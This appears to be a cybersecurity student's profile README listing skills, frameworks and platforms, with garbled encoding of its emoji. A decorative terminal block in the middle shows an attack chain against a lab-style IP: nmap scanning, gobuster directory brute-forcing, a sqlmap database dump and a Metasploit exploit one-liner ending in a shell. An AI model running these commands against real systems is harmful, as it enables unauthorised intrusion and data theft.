Cybersecurity professional focused on penetration testing, vulnerability research, and offensive security engineering.
Currently pursuing MSc Cyber Security with Professional Placement at Birmingham City University while building practical experience in security testing, red teaming concepts, and threat analysis.
I work on identifying vulnerabilities in systems, networks, and applications and translating them into real security improvements.
Pro methodology: Red | Blue | Purple Team
- Penetration Testing
- Exploit Development
- Web Application Security
- Red Team Methodologies
- Threat Detection
- Security Monitoring
- Incident Investigation
- Risk Assessment
- OWASP Top 10
- MITRE ATT&CK
- ISO 27001
- Digital Forensics Standards
|
|
|
|
|
π₯ Active in HTB, THM, OverTheWire | Web, Crypto, Pwn, Rev
π» Terminal Ops | Daily Pentest Routine
βββ(heaven@kali)-[~/pentest]\nββ$ nmap -sC -sV -p- --min-rate 5000 10.10.10.100
Starting Nmap 7.94...
80/tcp open http Apache httpd 2.4.41
βββ(heaven@kali)-[~/pentest]\nββ$ gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/admin (Status: 200)
βββ(heaven@kali)-[~/pentest]\nββ$ sqlmap -u "http://10.10.10.100/login.php?id=1" --dbs
Database: users_db
βββ(heaven@kali)-[~/pentest]\nββ$ msfconsole -q -x "use exploit/unix/webapp/php_xmlrpc_eval; set RHOSTS 10.10.10.100; run"
[*] Command shell session 1 opened...
PWNED! ππ- Linux (Kali, Ubuntu, Debian, Parrot)
- Windows 10 / 11
- macOS
- Android
- iOS
- English
- Hindi
- Gujarati
Email: nisargkc@gmail.com
β If you are passionate about cybersecurity research, penetration testing, and offensive security, feel free to connect or collaborate.

